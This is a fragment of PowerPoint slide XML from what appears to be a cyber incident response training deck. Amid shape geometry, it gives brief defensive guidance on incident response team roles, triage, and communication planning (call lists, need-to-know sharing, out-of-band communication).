                  <a:pt x="165607" y="993648"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9548368" y="993648"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9592385" y="987730"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9631943" y="971032"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9665462" y="945134"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9691360" y="911615"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9708058" y="872057"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9713976" y="828040"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9713976" y="165608"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9708058" y="121590"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9691360" y="82032"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9665461" y="48514"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9631943" y="22615"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9592385" y="5917"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9548368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585971" y="5893308"/>
            <a:ext cx="9714230" cy="967740"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="9714230" h="967740">
                <a:moveTo>
                  <a:pt x="9552686" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="161289" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="118430" y="5764"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="79906" y="22032"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47259" y="47259"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22032" y="79906"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5764" y="118430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="161290"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="806450"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5764" y="849309"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22032" y="887833"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47259" y="920480"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="79906" y="945707"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="118430" y="961975"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="161289" y="967740"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9552686" y="967740"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9595545" y="961975"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9634069" y="945707"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9666716" y="920480"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9691943" y="887833"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9708211" y="849309"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9713976" y="806450"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9713976" y="161290"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9708211" y="118430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9691943" y="79906"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9666716" y="47259"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9634069" y="22032"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9595545" y="5764"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9552686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187067" y="1882292"/>
            <a:ext cx="11876405" cy="46602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3530" marR="5080" indent="-291465">
              <a:lnSpc>
                <a:spcPct val="114999"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pP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Preparing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incident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response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entails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developing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policies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procedures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dealing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with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breaches,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Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>as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well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Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>as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necessary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personnel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resources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carry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20">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>them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Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>out.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200">
              <a:latin typeface="Microsoft Sans Serif"/>
              <a:cs typeface="Microsoft Sans Serif"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marL="2727325" marR="1558290">
              <a:lnSpc>
                <a:spcPct val="114100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="5"/>
              </a:spcBef>
            </a:pP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Reporting,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categorizing,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prioritizing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(triage)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usually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managed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group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30">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>CIRT,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80">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>CERT,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55">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>CSIRT,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25">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>SOC.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900">
              <a:latin typeface="Microsoft Sans Serif"/>
              <a:cs typeface="Microsoft Sans Serif"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marL="2521585" marR="1349375">
              <a:lnSpc>
                <a:spcPct val="114100"/>
              </a:lnSpc>
            </a:pP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Management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decision-making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authority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necessary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act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against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critical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matters.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750">
              <a:latin typeface="Microsoft Sans Serif"/>
              <a:cs typeface="Microsoft Sans Serif"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marL="1160780">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pP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Incident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analysts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24/7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availability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should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considered.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585971" y="7234428"/>
            <a:ext cx="9714230" cy="967740"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="9714230" h="967740">
                <a:moveTo>
                  <a:pt x="9552686" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="161289" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="118430" y="5764"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="79906" y="22032"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47259" y="47259"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22032" y="79906"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5764" y="118430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="161290"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="806450"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5764" y="849327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22032" y="887856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47259" y="920499"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="79906" y="945719"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="118430" y="961978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="161289" y="967740"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9552686" y="967740"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9595545" y="961978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9634069" y="945719"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9666716" y="920499"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9691943" y="887856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9708211" y="849327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9713976" y="806450"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9713976" y="161290"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9708211" y="118430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9691943" y="79906"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9666716" y="47259"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9634069" y="22032"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9595545" y="5764"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9552686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673346" y="7523480"/>
            <a:ext cx="8065134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Additional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inputs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50">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>from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roles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not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technical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required.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99023" y="306451"/>
            <a:ext cx="545465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80">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cyber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95">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Incident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125">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Response</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-125">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="120">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Team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84320" y="760476"/>
            <a:ext cx="8157972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44039" y="1882292"/>
            <a:ext cx="11562080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15135" marR="5080" indent="-1703070">
              <a:lnSpc>
                <a:spcPct val="114999"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pP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Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>major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incidents,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additional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expertise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advice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50">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>from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Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>other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business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 divisions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will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be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required.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There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roles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beyond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technical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responses,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such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Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>as: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37604" y="3294888"/>
            <a:ext cx="3418331" cy="438912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082285" y="6325565"/>
            <a:ext cx="134429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Marketing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48670" y="4623942"/>
            <a:ext cx="302006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90">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Human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Resources </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-95">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>(HR)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65646" y="3719322"/>
            <a:ext cx="7054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Legal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3394" y="306451"/>
            <a:ext cx="918845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40">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Communication</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-95">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="130">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Plan</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-114">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="175">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>and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110">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Stakeholder</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-90">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="200">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Management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0452" y="760476"/>
            <a:ext cx="13621512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65730" y="1882292"/>
            <a:ext cx="11918315" cy="13093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14999"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pP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Only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trusted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parties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who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identified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call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list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should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able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get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Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>information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25">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>to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prevent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inadvertent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disclosure.</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Microsoft Sans Serif"/>
              <a:cs typeface="Microsoft Sans Serif"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marL="4445">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1395"/>
              </a:spcBef>
            </a:pP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Ensure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have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a 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call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list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identifying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trusted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parties.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44346" y="4402073"/>
            <a:ext cx="6160135" cy="2914015"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6160134" h="2914015">
                <a:moveTo>
                  <a:pt x="0" y="485648"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2223" y="438875"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8756" y="393361"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19397" y="349308"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33941" y="306921"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="52185" y="266402"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="73926" y="227955"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="98960" y="191784"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="127083" y="158092"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="158092" y="127083"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="191784" y="98960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="227955" y="73926"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="266402" y="52185"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="306921" y="33941"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="349308" y="19397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="393361" y="8756"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="438875" y="2223"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="485647" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5674359" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5721132" y="2223"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5766646" y="8756"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5810699" y="19397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5853086" y="33941"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5893605" y="52185"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5932052" y="73926"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5968223" y="98960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6001915" y="127083"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6032924" y="158092"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6061047" y="191784"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6086081" y="227955"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6107822" y="266402"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6126066" y="306921"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6140610" y="349308"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6151251" y="393361"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6157784" y="438875"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6160008" y="485648"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6160008" y="2428240"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6157784" y="2475012"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6151251" y="2520526"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6140610" y="2564579"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6126066" y="2606966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6107822" y="2647485"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6086081" y="2685932"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6061047" y="2722103"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6032924" y="2755795"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6001915" y="2786804"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5968223" y="2814927"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5932052" y="2839961"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5893605" y="2861702"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5853086" y="2879946"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5810699" y="2894490"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5766646" y="2905131"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5721132" y="2911664"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5674359" y="2913888"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="485647" y="2913888"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="438875" y="2911664"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="393361" y="2905131"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="349308" y="2894490"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="306921" y="2879946"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="266402" y="2861702"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="227955" y="2839961"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="191784" y="2814927"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="158092" y="2786804"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="127083" y="2755795"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="98960" y="2722103"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="73926" y="2685932"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="52185" y="2647485"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33941" y="2606966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19397" y="2564579"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8756" y="2520526"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2223" y="2475012"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2428240"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="485648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514347" y="5281422"/>
            <a:ext cx="503364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Share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dirty="0" sz="22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need-to-know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basis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14347" y="6000140"/>
            <a:ext cx="533019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13599"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="10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Out-of-band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communications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avoid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alerting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Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>intruder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18360" y="3909059"/>
            <a:ext cx="4410710" cy="984885"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4410709" h="984885">
                <a:moveTo>
                  <a:pt x="4246372" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="164083" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120444" y="5857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81242" y="22389"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48037" y="48037"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22389" y="81242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5857" y="120444"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="164084"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="820419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5857" y="864059"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22389" y="903261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48037" y="936466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81242" y="962114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120444" y="978646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="164083" y="984503"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4246372" y="984503"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4290011" y="978646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4329213" y="962114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4362418" y="936466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4388066" y="903261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4404598" y="864059"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4410456" y="820419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4410456" y="164084"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4404598" y="120444"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4388066" y="81242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4362418" y="48037"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4329213" y="22389"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4290011" y="5857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4246372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951226" y="4205986"/>
            <a:ext cx="274383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75">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Communication</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>plan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888730" y="4406646"/>
            <a:ext cx="6160135" cy="2909570"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6160134" h="2909570">
                <a:moveTo>
                  <a:pt x="0" y="484886"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2219" y="438180"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8741" y="392733"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19363" y="348746"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33883" y="306423"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="52096" y="265967"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="73800" y="227580"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="98792" y="191466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="126869" y="157828"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="157828" y="126869"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="191466" y="98792"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="227580" y="73800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="265967" y="52096"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="306423" y="33883"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="348746" y="19363"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="392733" y="8741"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="438180" y="2219"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="484886" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5675122" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5721827" y="2219"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5767274" y="8741"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5811261" y="19363"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5853584" y="33883"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5894040" y="52096"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5932427" y="73800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5968541" y="98792"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6002179" y="126869"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6033138" y="157828"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6061215" y="191466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6086207" y="227580"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6107911" y="265967"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6126124" y="306423"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6140644" y="348746"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6151266" y="392733"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6157788" y="438180"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6160008" y="484886"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6160008" y="2424429"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6157788" y="2471135"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6151266" y="2516582"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6140644" y="2560569"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6126124" y="2602892"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6107911" y="2643348"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6086207" y="2681735"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6061215" y="2717849"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6033138" y="2751487"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6002179" y="2782446"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5968541" y="2810523"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5932427" y="2835515"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5894040" y="2857219"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5853584" y="2875432"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5811261" y="2889952"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5767274" y="2900574"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5721827" y="2907096"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5675122" y="2909316"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="484886" y="2909316"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="438180" y="2907096"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="392733" y="2900574"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="348746" y="2889952"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="306423" y="2875432"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="265967" y="2857219"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="227580" y="2835515"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="191466" y="2810523"/>
                </a:lnTo>
                <a:lnTo>
